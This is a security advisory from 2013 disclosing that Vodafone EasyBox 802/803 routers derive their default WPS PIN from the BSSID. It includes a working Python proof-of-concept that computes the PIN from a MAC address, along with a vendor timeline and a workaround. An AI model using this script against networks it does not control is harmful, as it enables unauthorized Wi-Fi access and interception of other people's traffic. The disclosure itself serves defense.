Vodafone EasyBox Default WPS PIN Algorithm Weakness

SEC Consult Vulnerability Lab Security Advisory < 20130805-0 >

=======================================================================

title: Vodafone EasyBox Default WPS PIN Algorithm Weakness

product: EasyBox 802 & EasyBox 803

vulnerable version: EasyBox 802 - all versions

EasyBox 803 - Production date before August 2011

fixed version: EasyBox 802 - no vendor patch available

EasyBox 803 - Production date after August 2011

impact: Critical

homepage: www.vodafone.de

found: 2012-12-01

by: Stefan Viehböck

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

Vendor/product description:

-----------------------------

These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are

rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be

accessed with the default WPS PIN (PIN External Registrar) printed on the back

of the device.

 

Vulnerability overview/description:

-----------------------------------

The algorithm that generates the default WPS-PIN is entirely based on the MAC

address (=BSSID) and serial number of the device. The serial number can be

derived from the MAC address.

An unauthenticated attacker within the range of the access point can capture

the BSSID (eg. from 802.11 Beacon Frames) and calculate the default WPS PIN

for it. This PIN can then be used to retrieve the current access point

configuration (including the WPA passphrase) or to change the configuration

(SSID, encryption method, passphrase, ...) of the access point.

An attacker can afterwards connect to the access point and perform malicious

activities such as Man-in-the-middle attacks using ARP spoofing, attack clients

on the internal network, etc.

 

Proof of concept:

-----------------

A script that implements the derivation algorithm has been developed:

#!/usr/bin/env python

import sys, re

def gen_pin (mac_str, sn):

mac_int = [int(x, 16) for x in mac_str]

sn_int = [0]*5+[int(x) for x in sn[5:]]

hpin = [0] * 7

 

k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF

k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF

hpin[0] = k1 ^ sn_int[9];

hpin[1] = k1 ^ sn_int[8];

hpin[2] = k2 ^ mac_int[9];

hpin[3] = k2 ^ mac_int[10];

hpin[4] = mac_int[10] ^ sn_int[9];

hpin[5] = mac_int[11] ^ sn_int[8];

hpin[6] = k1 ^ sn_int[7];

pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000

# WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or

# download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc

accum = 0

t = pin

while (t):

accum += 3 * (t % 10)

t /= 10

accum += t % 10

t /= 10

return '%i%i' % (pin, (10 - accum % 10) % 10)

def main():

if len(sys.argv) != 2:

sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n')

 

mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])

if len(mac_str) != 12:

sys.exit('check MAC format!\n')

 

sn = 'R----%05i' % int(mac_str[8:12], 16)

print 'derived serial number:', sn

print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])

print 'WPS pin:', gen_pin(mac_str, sn)

if __name__ == "__main__":

main()

 

Vulnerable / tested versions:

-----------------------------

The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803,

both produced by Arcadyan/Astoria Networks. Other devices of this vendor

(including EasyBox 903) might be affected as well. Vodafone did not provide

any information on this.

According to Vodafone / CERT-Bund, the following devices are vulnerable:

EasyBox 802 - all versions

EasyBox 803 - production date before August 2011

 

Vendor contact timeline:

------------------------

2012-12-14: Contacting Vodafone via customer support.

2013-01-09: Vodafone refers to datenschutz@vodafone.com.

2013-01-10: Requesting encryption keys.

2013-01-14: Vodafone provides encryption keys.

2013-01-15: Sending advisory and proof of concept exploit via encrypted

channel.

2013-01-25: Sending reminder regarding SEC Consult disclosure policy.

2013-01-25: Automatic response: Out of office until 2013-02-24.

2013-01-25: Requesting new contact person from CSIRT-DE@vodafone.com

and DU-DE-ZV-MXL-CSIRT-DE@vodafone.com.

2013-01-28: Vodafone acknowledges receipt of advisory.

2013-02-05: Vodafone confirms validity of provided information, gives

information about some newer devices which are not affected,

mentions that customers have already been notified to change

"default passwords" (no details given).

2013-02-21: Requesting information regarding affected products/product versions,

clarification regarding "default passwords", URLs/communication

channels used for mentioned notifications, ways for identifying

vulnerable devices (end users), ...

2013-03-13: Still no response - sending deadline dates

2013-05-29: Contacting German CERT-Bund for further coordination in order to

warn end users

2013-08-05: Coordinated release of advisory with German CERT-Bund

 

Solution:

---------

Vodafone does not provide a solution for the affected devices.

 

Workaround:

-----------

Either change the WPS PIN or disable WPS entirely.

SEC Consult could not confirm if WPS actually is disabled (as opposed to just

not being advertised), so both changing the PIN and disabling WPS is

recommended.

 

Advisory URL:

--------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult

Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:

Mooslackengasse 17, 1190 Vienna, Austria

Phone: +43 1 8903043 0

Fax: +43 1 8903043 15

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

EOF Stefan Viehböck / @2013